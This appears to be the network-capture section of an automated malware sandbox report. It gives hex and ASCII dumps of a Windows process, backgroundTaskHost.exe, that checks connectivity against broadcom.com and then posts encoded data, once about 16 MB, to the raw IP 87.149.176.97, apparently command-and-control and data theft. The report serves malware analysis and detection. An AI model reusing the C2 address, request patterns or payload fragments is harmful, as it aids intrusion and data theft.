                                                                                                                                                                                                              2023-02-07 18:48:32 UTC272INData Raw: 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 42 02 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 43 02 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 44 02 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02
                                                                                                                                                                                                              Data Ascii: BBBBBBBBBBBBBBBBBBBBBrrrrrrrrCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCrrrrrrrrrrrDrrrrrrrrrrrrrrrrEEEEEEEEEEEEEEEEEE
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC288INData Raw: 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 72 00 72 00 72 00 72 00 72 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00
                                                                                                                                                                                                              Data Ascii: rrrrrrrrrrrrr
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC304INData Raw: a3 38 e4 74 52 50 e8 45 d7 03 00 bb 10 00 00 87 2e 13 bb f3 1e 5a d4 06 2e d7 00 00 00 53 3a 4e b1 24 03 e3 bb 01 00 87 c5 80 c3 02 eb ae bb 4c c2 cf 67 83 c3 4d 53 e1 fe c3 74 32 bb 00 00 87 c5 50 8d 45 e8 3a d2 f3 79 eb af 0f 00 00 59 0e 80 f3 66 3b ff 74 d7 04 06 00 83 c3 04 53 66 bc 0c 77 d9 55 8b ec 83 6b dd 65 3b ff 74 a4 e8 0d ca 03 00 59 89 45 f8 bd 33 0c 84 76 ff ff ff 78 90 f3 8b 45 e8 8b 55 6b 2e 03 c9 c3 e9 8f 00 87 c5 88 45 10 bb 00 00 87 c5 22 18 e9 91 00 00 87 c6 e0 89 45 fc eb ea 0c 80 ff eb 7c bb 01 00 87 c5 20 c3 74 f2 ff 75 97 2e 3b ff 75 10 ff 75 7b 3a 76 0c 66 3b ed 74 87 3a 76 08 e8 71 00 00 87 7e 17 00 00 00 eb c9 78 b0 0b e8 ee 05 00 00 de ff c3 74 24 e8 48 12 87 c5 b8 10 00 00 00 03 64 2e 9c e8 9c 06 00 00 de 3a 76 0c 3a e4 74 bb
                                                                                                                                                                                                              Data Ascii: 8tRPE.Z.S:N$LgMSt2PE:yYf;tSfwUke;tYE3vxEUk.E"E| tu.;uu{:vf;t:vq~xt$Hd.:v:t
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC320INData Raw: ef 7c d3 8a 2f d1 77 2d 49 3d b1 5f 55 2e af 0c bc a5 c3 6b cf 3c 46 dc 34 5e d8 00 9d 96 f1 ff 6a 5e 17 4e 5c 81 f3 83 fe 8c bb fd f4 ee 9e ec d3 e8 43 e5 ff ea 20 72 77 59 bf fe d8 65 66 d5 26 a0 b7 e0 7d 56 5a 01 3f 22 0e d5 c4 4b f8 91 80 a2 8e f5 75 7c 6f 83 6b 4e d3 9a 37 5e 0c 50 46 b8 ec 91 68 18 29 8c 58 cf 4d 38 2f 47 10 42 7b 72 25 bd b5 84 be e0 98 e8 58 ae fd 9f c5 f3 0d cd 05 51 6f de 8e 41 30 df 8a aa 44 40 a9 11 7a 21 7c f5 e2 a3 fe 89 aa a3 b3 5f 2f 44 07 cc 7e ae 02 b0 ab 3a 7b e0 9c 42 74 d8 4b e2 73 32 33 75 2f b4 52 f5 c8 13 0f 09 3a dc cd cc 98 1e 18 8d 9f 20 b5 b0 a8 55 58 6f c2 d4 db f2 54 d3 4a 08 38 f8 e1 de 08 0f f3 42 a6 00 ff 3d 66 87 83 f0 d7 a0 b6 19 57 1a 0c d7 42 6b 2d f8 75 80 58 ce 4a e5 ba a3 09 a5 24 19 57 67 97 83 d1
                                                                                                                                                                                                              Data Ascii: |/w-I=_U.k<F4^j^N\C rwYef&}VZ?"Ku|okN7^PFh)XM8/GB{r%XQoA0D@z!|_/D~:{BtKs23u/R: UXoTJ8B=fWBk-uXJ$Wg
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC336INData Raw: 7e 20 41 10 0b 04 7c 84 83 fe 8a ae 83 7a 72 c2 6b ae e0 2b fc f5 2e 64 5f da 90 73 62 9e 21 dd f7 82 cb dd 0b f5 ba fa 6b e0 b0 f8 67 9b c8 a3 64 dd e2 80 86 f3 45 f2 2d 61 0e 99 72 aa 60 07 f7 1f cf b0 a4 a1 0f 60 3d 96 ab 0d e9 d1 3f b4 05 42 f2 cc 11 0a aa f3 06 a6 48 24 a3 64 19 9b 2d 1a 50 56 6b 83 00 a4 7e f3 fb 3e fb 9e 03 3c 0d 78 15 07 78 62 4f 69 ce b8 eb bd db 38 bd f8 b7 1f 44 a1 ac 87 be 02 70 5a 52 84 08 42 13 15 f9 d9 6e 89 d6 b7 f7 7e 69 d1 7e 4e 2f ce e0 46 2c 44 e4 54 f3 a3 5b b8 a9 8a 92 07 03 ce 4a f7 d6 66 06 ae bc 2b c9 72 72 49 26 4c 38 21 4b f0 35 9a 1a a7 9e 8c b3 18 ff 84 ba 00 aa 53 8b b6 36 f4 1f ac 20 6d eb 8e 42 25 23 05 da d7 1e 97 38 36 ff 3b ae 34 6d d4 6c 68 85 71 c6 bc 35 9b 87 9f 67 8f 51 c2 b9 07 2c fa a9 79 e8 24 19
                                                                                                                                                                                                              Data Ascii: ~ A|zrk+.d_sb!kgdE-ar``=?BH$d-PVk~><xxbOi8DpZRBn~i~N/F,DT[Jf+rrI&L8!K5S6 mB%#86;4mlhq5gQ,y$
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC352INData Raw: 2a 39 64 54 9b af 5d 70 66 db cb f2 ef 02 40 4f 0d 02 fb e9 f7 76 9d 3c 29 28 66 ab 7f 74 88 35 f9 7f 2d 4b ba f5 7a c7 e6 55 d0 9f 8b 86 3c ba 7c a6 68 5a 64 59 b9 ee d1 18 4a 68 44 b5 90 20 c4 8b 47 69 a5 a3 5b 61 e5 91 c5 e2 26 dc 16 c3 42 eb 5d c6 c9 07 37 61 56 6e 49 6c b5 b2 08 94 b6 2a e4 a7 5f 54 f6 31 31 aa e8 99 19 19 45 b8 4f 1a 74 38 f9 96 4c fd c4 39 08 79 96 ca 56 56 56 43 91 a4 5d d0 06 26 4d 4b eb 2f 02 7b 29 71 35 30 e8 d4 58 54 ac 04 bb d3 2c 9c 72 5e 30 0a fc f6 85 56 0c 7f c7 60 14 2c 0e 81 8c d5 06 a1 68 40 06 fe 66 52 d1 0e f5 3e e4 cd b9 aa 34 3d e7 15 3c b5 34 43 04 a9 83 b2 6f 02 6d 5f 14 24 6c 58 a0 0f d0 46 b7 5b 39 09 61 84 80 69 d9 82 86 24 4b e4 98 82 da 20 27 58 f1 42 c7 81 ae c8 b3 65 1b 77 3f 5d d4 56 c0 ca 08 b6 cc 0a 88
                                                                                                                                                                                                              Data Ascii: *9dT]pf@Ov<)(ft5-KzU<|hZdYJhD Gi[a&B]7aVnIl*_T11EOt8L9yVVVC]&MK/{)q50XT,r^0V`,h@fR>4=<4Com_$lXF[9ai$K 'XBew?]V
                                                                                                                                                                                                              2023-02-07 18:48:33 UTC352INData Raw: d8 f2 67 b7 b5 34 cf 47 e9 c6 b4 04 30 a7 7f 2b 6d 64 27 4f 55 56 8e bc 71 22 0f 17 95 af 6f 99 17 0d f2 43 d4 9d 93 c8 ad 6c a4 00 a6 25 c4 5b d5 c6 be cb ed 26 7b 20 75 f4 e6 92 12 0a f8 ea 5e cb cc 50 aa 15 a5 d3 d5 e8 55 0e 97 4b c0 fe e1 ee c2 f4 37 35 2a f8 41 e1 d2 ef 57 d6 19 18 25 dd c6 8b 29 14 01 40 e4 be b6 7e 94 13 43 f4 f7 15 df 15 a4 17 87 89 af 02 f5 57 a2 dd c7 82 6c 89 e6 6d 79 e8 98 d3 a1 b4 da ec b4 d9 bf 5b 2e ff 3a 4d 18 ec 9a b9 ff 2b 17 d2 f8 f0 d9 b1 eb ca 42 ec 95 77 09 c1 f0 f2 2b 1e ad 98 b4 d6 88 81 46 f8 7c 73 df 93 21 0a 6b 28 89 5a 14 45 ec db 5a 60 25 24 b0 d2 d6 44 41 33 7b f8 f9 2b 87 07 43 fb a3 48 9a b6 64 2a 95 a1 28 f5 66 51 d6 51 cb 53 4d 96 6f 3a 08 09 43 dc 60 e5 5a bd e7 63 e8 47 71 c3 38 75 ba a7 98 58 a5 e9 e5
                                                                                                                                                                                                              Data Ascii: g4G0+md'OUVq"oCl%[&{ u^PUK75*AW%)@~CWlmy[.:M+Bw+F|s!k(ZEZ`%$DA3{+CHd*(fQQSMo:C`ZcGq8uX
                                                                                                                                                                                                              2023-02-07 18:48:33 UTC368INData Raw: d2 d8 ef db db ba 37 7a 80 7b f6 ac f2 68 da 11 86 a3 9b 53 ea c7 01 b8 32 5f 59 95 2b 91 34 5b 96 88 6d ed 85 41 e0 cc 2c d4 73 28 af 1f 09 4f 38 2b 26 2e 20 92 f2 c6 5b d2 46 ba d2 4d 5b e4 2a 1f 98 c7 4c c0 77 12 16 dc c0 3c 65 64 f1 90 dd b7 31 39 76 79 ee 4d ea 43 25 4c 02 15 4c b4 0f 1a 87 ac 05 05 89 d6 4b f3 07 67 da de 54 1a 3b 00 f9 a6 9f 95 aa d6 60 0f 00 c0 e8 1f c9 82 21 07 fe b8 fc 10 e7 1f 9b 30 30 ea 0a a2 0c 19 db be ce 89 ac 76 ac b4 fa 36 06 1f 29 07 a6 e3 20 50 36 8a 21 32 30 ea a8 39 e8 2d d7 01 76 11 8b 1a a5 70 ad 99 4c 0c b9 26 e4 9f f1 b5 a9 76 b1 34 f1 6e d2 17 03 40 2f 54 d8 8e b8 79 f3 bf 46 d2 8b 9e a2 43 41 26 1a 06 01 13 0a fc 90 52 be 21 39 b3 6d 86 70 0a 2c 24 2e 32 a7 53 1d 67 53 4d c2 88 39 be a3 63 52 e4 dd 91 9c 0b b2
                                                                                                                                                                                                              Data Ascii: 7z{hS2_Y+4[mA,s(O8+&. [FM[*Lw<ed19vyMC%LLKgT;`!00v6) P6!209-vpL&v4n@/TyFCA&R!9mp,$.2SgSM9cR
                                                                                                                                                                                                              2023-02-07 18:48:33 UTC384INData Raw: a1 7a 9e 7e 7f dd 02 f2 b7 04 fe 7e 11 31 8a 05 b7 fe 3e 89 ad 7f b6 d2 f2 59 9b c7 4f 84 87 be f4 97 55 5c e5 c0 c1 19 ce 9c 88 f0 9d 2e 24 24 e1 d3 6f 62 6c d7 70 33 49 69 ff 93 3f a6 49 ed a7 a9 38 e7 ae 01 9f 3e 19 25 ca 9a 07 c2 66 66 23 90 9a 1a 11 36 36 a1 f7 29 22 7d bd 8c 7e 8a 0e c8 b3 ef 53 7b c1 e8 e7 42 91 a8 9d a3 eb 33 8c 43 90 90 d5 66 ec 64 a5 b4 e1 c4 a2 fc 1c ef 61 46 79 fd c5 7b 9d 51 af cf 13 b2 9f f2 43 f2 e9 b7 01 01 d0 8f 85 85 c0 f3 3e 0e 69 90 bb 16 12 64 96 01 6d 3a 5f 9b 71 ef 0f 1b 63 8d 1e 35 06 81 1d 44 05 09 9c 14 0b b8 b2 b2 77 ea 80 c8 bd ca bc 8f 57 b1 b8 9b f9 a0 a0 54 b2 24 21 a5 17 54 59 e8 71 9b 8f 4e 61 14 13 03 46 f5 ff 7f 2a d0 ce ae 65 7f 0d 58 f8 2b b2 2d b5 4d e1 0d 3f be 53 6f 8b da f2 f9 ae f4 25 5c 81 82 b8
                                                                                                                                                                                                              Data Ascii: z~~1>YOU\.$$oblp3Ii?I8>%ff#66)"}~S{B3CfdaFy{QC>idm:_qc5DwWT$!TYqNaF*eX+-M?So%\
                                                                                                                                                                                                              2023-02-07 18:48:33 UTC400INData Raw: 66 e3 45 1a 7d 6b 35 35 50 e3 69 aa 3c 63 99 4a 11 2b 26 6b af 97 07 98 c6 75 79 42 18 0e 07 fc eb ef 57 8c 07 27 38 9c 2f 01 0c 9c d9 69 63 c3 f6 68 79 52 aa 11 8d 34 62 91 99 df 5b 80 14 6d 23 ed dc f1 65 a0 9b 92 d8 47 b2 a4 32 99 a3 94 d1 5d 35 35 70 c3 41 6c db 95 43 f2 6b 26 fd 3d 58 6c 5c 5b c5 e7 92 fa 89 32 07 86 ae 7d 15 f6 4b 50 59 53 a5 e5 32 32 6f dc 46 54 99 75 fe a8 e0 79 5a ce 27 ca b1 f1 b2 25 db ae 47 46 e5 fc 49 28 d5 53 85 e6 16 74 1b 95 1f 19 73 96 9c 9c cd fa 42 b6 53 ae 07 c4 e9 89 b0 27 ba 3e 9a 11 66 95 0b 30 74 83 7f bf a2 6a 4e c6 59 7b 5a 5a 18 a7 ab 98 f5 06 0c cc 05 b2 20 e5 f7 5b 70 19 9c 29 11 09 1f 14 03 47 d9 54 1b 62 ba 80 48 e1 87 25 2f 2c 09 b5 f6 e3 a6 0c 34 94 9a 68 62 62 27 14 ca 93 54 45 d6 f3 48 08 95 d3 03 88 c1
                                                                                                                                                                                                              Data Ascii: fE}k55Pi<cJ+&kuyBW'8/ichyR4b[m#eG2]55pAlCk&=Xl\[2}KPYS22oFTuyZ'%GFI(StsBS'>f0tjNY{ZZ [p)GTbH%/,4hbb'TEH
                                                                                                                                                                                                              2023-02-07 18:48:33 UTC416INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                              2023-02-07 18:48:33 UTC432INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                              1192.168.11.204983650.112.202.115443C:\Windows\SysWOW64\backgroundTaskHost.exe
                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                              2023-02-07 18:52:10 UTC440OUTGET / HTTP/1.1
                                                                                                                                                                                                              Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                              Host: broadcom.com
                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                              2023-02-07 18:52:11 UTC440INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Tue, 07 Feb 2023 18:52:10 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Location: https://www.broadcom.com/
                                                                                                                                                                                                              Content-Length: 233
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                              2023-02-07 18:52:11 UTC441INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 72 6f 61 64 63 6f 6d 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.broadcom.com/">here</a>.</p></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                              2192.168.11.204983887.149.176.97443C:\Windows\SysWOW64\backgroundTaskHost.exe
                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                              2023-02-07 18:52:11 UTC441OUTPOST /t5 HTTP/1.1
                                                                                                                                                                                                              Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                              Host: 87.149.176.97
                                                                                                                                                                                                              Content-Length: 80
                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                              2023-02-07 18:52:11 UTC441OUTData Raw: 70 67 65 68 75 69 69 70 6b 6d 6d 3d 6b 54 68 43 53 41 59 54 39 6d 50 5a 66 34 54 58 69 38 78 4f 62 6b 74 47 45 66 51 58 4a 57 43 4b 79 54 4b 65 65 53 58 33 6c 2b 67 41 57 50 47 59 53 39 65 76 53 6e 68 6b 35 72 32 49 67 51 46 54 38 67 3d 3d
                                                                                                                                                                                                              Data Ascii: pgehuiipkmm=kThCSAYT9mPZf4TXi8xObktGEfQXJWCKyTKeeSX3l+gAWPGYS9evSnhk5r2IgQFT8g==
                                                                                                                                                                                                              2023-02-07 18:52:11 UTC441INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx/1.9.12
                                                                                                                                                                                                              Content-Length: 84
                                                                                                                                                                                                              2023-02-07 18:52:11 UTC441INData Raw: 68 45 34 62 48 73 35 65 44 4e 2f 36 42 31 47 56 37 4d 4d 6b 34 36 57 73 75 51 61 54 63 31 63 42 68 41 2b 72 33 69 70 6f 4b 33 53 54 56 30 35 38 75 50 49 48 46 56 75 2b 4c 62 52 33 58 6b 2f 42 41 67 69 56 4c 48 62 74 55 79 31 79 70 7a 36 56 64 50 34 3d
                                                                                                                                                                                                              Data Ascii: hE4bHs5eDN/6B1GV7MMk46WsuQaTc1cBhA+r3ipoK3STV058uPIHFVu+LbR3Xk/BAgiVLHbtUy1ypz6VdP4=


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                              3192.168.11.204984087.149.176.97443C:\Windows\SysWOW64\backgroundTaskHost.exe
                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                              2023-02-07 18:52:29 UTC441OUTPOST /t5 HTTP/1.1
                                                                                                                                                                                                              Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                              Host: 87.149.176.97
                                                                                                                                                                                                              Content-Length: 16611526
                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                              2023-02-07 18:52:29 UTC442OUTData Raw: 77 68 64 79 70 3d 52 73 72 33 5a 67 4e 2b 33 4b 53 62 4d 73 72 5a 6b 70 65 4a 72 75 72 78 50 4d 68 64 6c 2f 73 46 48 41 69 6d 63 74 65 54 65 6c 47 71 6f 4f 66 6d 64 63 53 64 36 64 54 65 5a 53 79 63 42 49 73 4d 4a 2f 53 76 32 79 73 70 72 71 55 51 2b 49 74 33 43 4e 35 2b 51 56 61 4f 66 32 44 70 6f 74 30 46 4a 72 30 4d 4b 39 57 4d 30 2b 54 64 50 6b 61 59 42 6d 4d 36 77 63 50 6a 64 44 38 57 56 32 73 31 47 6e 4d 59 6d 77 7a 79 6d 67 49 74 73 4b 6c 72 63 6f 64 35 2f 55 37 47 72 54 62 76 4c 79 79 48 6f 35 4b 56 6c 33 39 4d 38 4e 69 59 36 58 73 58 64 75 38 39 4a 47 50 47 2b 61 62 37 2b 74 56 75 46 4e 59 78 61 52 38 62 45 62 66 4b 63 55 69 52 68 4f 35 49 37 65 57 4e 67 6e 69 69 68 45 73 31 54 61 65 43 52 66 43 50 2f 6e 5a 4a 6e 78 68 45 39 64 34 2f 36 61 6c 41 6e
                                                                                                                                                                                                              Data Ascii: whdyp=Rsr3ZgN+3KSbMsrZkpeJrurxPMhdl/sFHAimcteTelGqoOfmdcSd6dTeZSycBIsMJ/Sv2ysprqUQ+It3CN5+QVaOf2Dpot0FJr0MK9WM0+TdPkaYBmM6wcPjdD8WV2s1GnMYmwzymgItsKlrcod5/U7GrTbvLyyHo5KVl39M8NiY6XsXdu89JGPG+ab7+tVuFNYxaR8bEbfKcUiRhO5I7eWNgniihEs1TaeCRfCP/nZJnxhE9d4/6alAn
                                                                                                                                                                                                              2023-02-07 18:52:29 UTC458OUTData Raw: 30 31 37 6b 53 55 72 49 56 47 47 53 69 4b 52 68 57 75 33 44 62 51 33 57 51 49 68 47 79 66 39 59 67 51 54 44 71 31 63 44 78 6f 63 57 32 30 34 75 36 32 68 31 6f 67 2b 57 6c 4f 4b 62 42 79 4d 61 39 44 6b 77 51 47 38 75 78 2b 4c 79 39 51 53 4b 4a 68 46 4f 72 53 78 74 68 34 31 45 48 78 43 74 76 56 6b 54 69 46 6d 73 38 6b 6a 6d 69 6f 77 38 39 71 2b 63 39 31 45 4e 53 75 33 34 47 37 50 71 48 68 37 2f 47 30 72 66 49 71 78 6f 79 72 36 65 6b 30 77 65 70 72 35 57 4f 37 2f 65 33 7a 54 56 63 6b 62 38 7a 47 78 33 67 41 69 50 38 6e 33 35 79 69 61 48 45 54 2f 31 73 57 53 63 45 73 33 34 54 74 73 54 61 33 46 43 5a 64 61 58 69 46 41 78 65 48 55 6b 64 56 61 31 65 79 56 71 2f 41 66 54 70 42 2f 76 56 4f 54 32 4d 4f 39 70 67 67 4d 32 4a 73 2f 66 41 7a 77 47 6d 33 30 2f 6a 78 69
                                                                                                                                                                                                              Data Ascii: 017kSUrIVGGSiKRhWu3DbQ3WQIhGyf9YgQTDq1cDxocW204u62h1og+WlOKbByMa9DkwQG8ux+Ly9QSKJhFOrSxth41EHxCtvVkTiFms8kjmiow89q+c91ENSu34G7PqHh7/G0rfIqxoyr6ek0wepr5WO7/e3zTVckb8zGx3gAiP8n35yiaHET/1sWScEs34TtsTa3FCZdaXiFAxeHUkdVa1eyVq/AfTpB/vVOT2MO9pggM2Js/fAzwGm30/jxi
                                                                                                                                                                                                              2023-02-07 18:52:29 UTC474OUTData Raw: 7a 4b 4c 67 69 42 72 74 74 74 6a 36 6f 57 6b 69 47 56 53 45 72 2b 6b 72 76 48 6d 62 64 76 45 32 4c 6f 56 47 73 6e 49 45 79 72 6a 4b 6e 4f 4c 42 52 69 7a 64 49 57 49 57 71 48 37 45 70 47 59 78 65 45 6b 43 4e 73 54 32 53 54 75 36 77 77 2b 33 6b 55 76 37 45 65 69 2f 43 34 74 72 57 59 35 4c 47 2b 69 7a 54 4d 42 38 45 34 48 38 2f 37 6e 48 6a 6d 51 48 31 68 2b 47 45 70 4b 4a 58 69 69 42 75 37 4f 34 79 70 4c 4e 57 6e 35 48 56 6f 59 50 59 38 79 75 57 68 33 51 65 4b 59 71 5a 34 45 4c 30 6a 54 42 58 41 68 2f 2f 52 68 78 58 31 31 64 36 47 4f 41 62 71 79 65 6f 70 34 37 64 6a 76 76 77 35 39 35 50 4c 37 39 37 6f 64 57 7a 37 33 6f 65 78 68 41 70 50 73 4f 53 30 30 6a 50 61 56 4b 37 71 55 45 66 7a 4b 53 36 54 39 66 61 2b 43 6b 64 39 38 79 4c 4a 73 53 76 32 6a 7a 6c 35 7a
                                                                                                                                                                                                              Data Ascii: zKLgiBrtttj6oWkiGVSEr+krvHmbdvE2LoVGsnIEyrjKnOLBRizdIWIWqH7EpGYxeEkCNsT2STu6ww+3kUv7Eei/C4trWY5LG+izTMB8E4H8/7nHjmQH1h+GEpKJXiiBu7O4ypLNWn5HVoYPY8yuWh3QeKYqZ4EL0jTBXAh//RhxX11d6GOAbqyeop47djvvw595PL797odWz73oexhApPsOS00jPaVK7qUEfzKS6T9fa+Ckd98yLJsSv2jzl5z
                                                                                                                                                                                                              2023-02-07 18:52:29 UTC490OUTData Raw: 63 58 5a 30 56 74 72 50 66 79 6a 4f 75 43 72 38 55 75 65 31 58 58 45 59 31 4a 54 35 72 58 70 43 2b 59 30 35 4a 33 35 33 68 76 67 51 6b 45 68 46 59 58 47 4a 46 38 4b 53 57 50 55 78 2f 57 36 4f 31 63 4b 45 34 67 66 68 58 63 6c 38 76 74 54 63 61 39 32 2f 31 6e 59 68 5a 56 74 41 30 71 32 65 72 53 53 77 2b 55 69 38 47 48 62 55 55 33 72 6a 65 55 50 31 77 4c 4d 73 69 4f 54 42 37 64 4b 39 73 6f 63 6f 51 49 45 69 41 34 61 67 61 75 43 7a 57 71 66 75 4b 65 42 59 57 49 39 77 67 4c 74 63 2f 57 71 75 4a 71 75 6e 55 75 58 4a 75 4d 38 6c 76 33 4e 6f 4a 4e 2b 64 77 78 50 4a 52 65 79 67 2b 62 63 47 54 6e 73 42 6a 65 5a 4f 79 4a 75 63 76 39 34 4a 66 4b 63 32 58 67 37 32 6f 50 77 44 47 5a 35 66 6c 7a 64 43 70 61 64 48 5a 47 70 46 6a 6a 2b 51 71 31 4e 31 36 42 2b 57 45 79 6b
